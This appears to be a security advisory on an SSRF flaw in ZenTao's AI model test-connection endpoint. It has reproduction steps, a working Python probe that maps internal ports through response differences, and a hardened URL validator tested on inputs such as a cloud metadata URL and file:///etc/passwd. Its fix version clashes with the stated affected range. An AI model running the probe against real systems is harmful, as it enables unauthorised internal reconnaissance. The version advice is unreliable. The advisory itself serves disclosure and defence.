ZenTao Server-Side Request Forgery Vulnerability in AI Model Test Connection
Vulnerability
A server-side request forgery (SSRF) vulnerability has been identified in ZenTao versions up to 21.7.6-8564. The issue lies in the 'makeRequest' function of 'module/ai/model.php', where the 'base' parameter (the API base URL for the configured AI model vendor) is not validated before the server issues a request to it, so an attacker can point it at hosts and ports that are reachable only from the ZenTao server. Because the error message and response time returned to the caller vary with the target, the endpoint acts as an oracle for internal network discovery and port scanning: it distinguishes open from closed ports and hints at the service type behind each. The vulnerability can be exploited remotely, and a public exploit is available.
Impact
Exploitation of this vulnerability allows internal port scanning and service discovery from the ZenTao server's network position. Attackers can identify open ports and services, infer service types from differences in error messages and latency, and use the results to probe for unauthenticated or vulnerable services inside the network that are not exposed directly to them.
Reproduction
To reproduce this vulnerability, send a POST request to '/zentao/ai-modelTestConnection.html' with the 'vendor' parameter set to 'openaiCompatible' and the 'base' parameter set to a URL pointing at an internal resource, such as 'http://127.0.0.1:8000/admin'. The request can be made with a tool such as curl or Postman; the body must be encoded as 'multipart/form-data'. To confirm the oracle rather than a single response, repeat the request against a port that is known to be closed on the same host and compare the error message and response time with those for the first target.
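The request described above, as an added example that is not code from ZenTao, the advisory or the public exploit: it hand-encodes the multipart/form-data POST with the Python standard library so the exact bytes can be inspected offline, and returns the status, latency and body excerpt that together form the port-scan oracle. 'ZENTAO' is a placeholder for the target installation; the endpoint path and the 'vendor' and 'base' parameter names are the ones given in the advisory.

```python
"""Reproduction request for the ai-modelTestConnection SSRF (added example)."""
import time
import urllib.error
import urllib.request
import uuid

ZENTAO = "http://zentao.example.internal"  # placeholder, replace with the target
ENDPOINT = "/zentao/ai-modelTestConnection.html"


def build_multipart(fields, boundary=None):
    """Encode plain text fields as multipart/form-data.

    Returns (body_bytes, content_type_header). A form field needs only a
    Content-Disposition header per part.
    """
    boundary = boundary or uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            f"\r\n{value}\r\n"
        )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode("utf-8"), f"multipart/form-data; boundary={boundary}"


def build_request(base, zentao=ZENTAO, vendor="openaiCompatible"):
    """POST to the test-connection endpoint with `base` pointing where we choose."""
    body, content_type = build_multipart({"vendor": vendor, "base": base})
    return urllib.request.Request(
        zentao + ENDPOINT,
        data=body,
        headers={"Content-Type": content_type},
        method="POST",
    )


def probe(base, timeout=15.0, **kwargs):
    """Send one request; return (status_or_error, elapsed_seconds, body_excerpt).

    The oracle is the difference between these tuples for two targets, for
    example http://127.0.0.1:8000/admin and http://127.0.0.1:1/: the advisory
    notes that the error message and response time vary with the target.
    """
    req = build_request(base, **kwargs)
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, time.monotonic() - start, resp.read(200)
    except urllib.error.HTTPError as exc:
        return exc.code, time.monotonic() - start, exc.read(200)
    except urllib.error.URLError as exc:
        return str(exc.reason), time.monotonic() - start, b""


if __name__ == "__main__":
    for target in ("http://127.0.0.1:8000/admin", "http://127.0.0.1:1/"):
        print(target, probe(target))
```

Run it against a test instance you are authorised to assess; the two printed tuples differing in error text or latency is the confirmation the Reproduction section asks for.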
Remediation
Users are advised to upgrade to ZenTao version 21.7.6, which addresses this vulnerability. The patch is available for download from the ZenTao website. After upgrading, verify the fix by repeating the reproduction request against an internal target and confirming that it is rejected rather than relayed. As defence in depth, restrict outbound connections from the ZenTao host to the AI vendor endpoints it actually needs, so that any remaining request-forwarding feature cannot reach internal services.
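The check a makeRequest-style helper should apply to a user-supplied URL such as 'base', shown as an added example that is not the ZenTao patch and not code from the advisory. It enforces a scheme and port allowlist, refuses credentials in the URL, resolves the host and rejects any address that is not globally routable (loopback, RFC 1918, link-local, IPv4-mapped IPv6 and similar), and returns a pinned address so a second DNS answer at connect time cannot swap in an internal one. The port allowlist is an assumption about where model vendors are reached; the function names are illustrative.

```python
"""Hardened validation of an outbound URL taken from a request (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # assumption: vendor APIs live on standard ports


class UnsafeURL(ValueError):
    """Raised for any URL the server must not fetch on the caller's behalf."""


def resolve_all(host):
    """Every IP the host maps to; an IP literal maps to itself without DNS.

    Legacy literals that ip_address() rejects (0x7f000001, 2130706433) fall
    through to getaddrinfo, which normalises them like the HTTP client's
    resolver would, so they are vetted as the address they really denote.
    """
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror as exc:
        raise UnsafeURL(f"cannot resolve {host!r}") from exc
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def vet_outbound_url(url):
    """Return (hostname, port, pinned_ip) for a URL that is safe to fetch.

    Raises UnsafeURL otherwise. Every address the name resolves to must be
    global: one internal record among several is enough to reject, because
    the HTTP client may pick any of them.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. unbalanced IPv6 brackets
        raise UnsafeURL("malformed URL") from exc
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {parts.scheme!r} not allowed")
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError as exc:  # non-numeric or out-of-range port
        raise UnsafeURL("malformed port") from exc
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port {port} not allowed")
    addrs = resolve_all(host)
    for addr in addrs:
        # is_global is False for loopback, private, link-local, multicast,
        # CGNAT, documentation and IPv4-mapped (::ffff:a.b.c.d) addresses.
        if not addr.is_global:
            raise UnsafeURL(f"{host} resolves to non-global address {addr}")
    # Pin: connect to the returned IP and send "Host: host" (server_hostname=host
    # for TLS) so a fresh lookup at connect time cannot return an internal
    # address. Re-run this check on every redirect target as well; a redirect to
    # 127.0.0.1 is the same SSRF.
    return host, port, str(addrs[0])


def is_safe_outbound_url(url):
    """Boolean wrapper for callers that only need an allow/deny decision."""
    try:
        vet_outbound_url(url)
        return True
    except UnsafeURL:
        return False


if __name__ == "__main__":
    for candidate in (
        "http://127.0.0.1:8000/admin",               # the advisory's probe
        "http://169.254.169.254/latest/meta-data/",  # cloud metadata, link-local
        "http://[::ffff:127.0.0.1]/",                # loopback as IPv4-mapped IPv6
        "http://10.0.0.5/",                          # RFC 1918
        "file:///etc/passwd",                        # disallowed scheme
        "http://8.8.8.8/v1",                         # global address, allowed
    ):
        verdict = "allow" if is_safe_outbound_url(candidate) else "deny"
        print(f"{candidate:45} {verdict}")
```

A denylist of address ranges is the minimum; where the set of vendors is known, an allowlist of hostnames checked before resolution is stricter and avoids the DNS dependency entirely.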
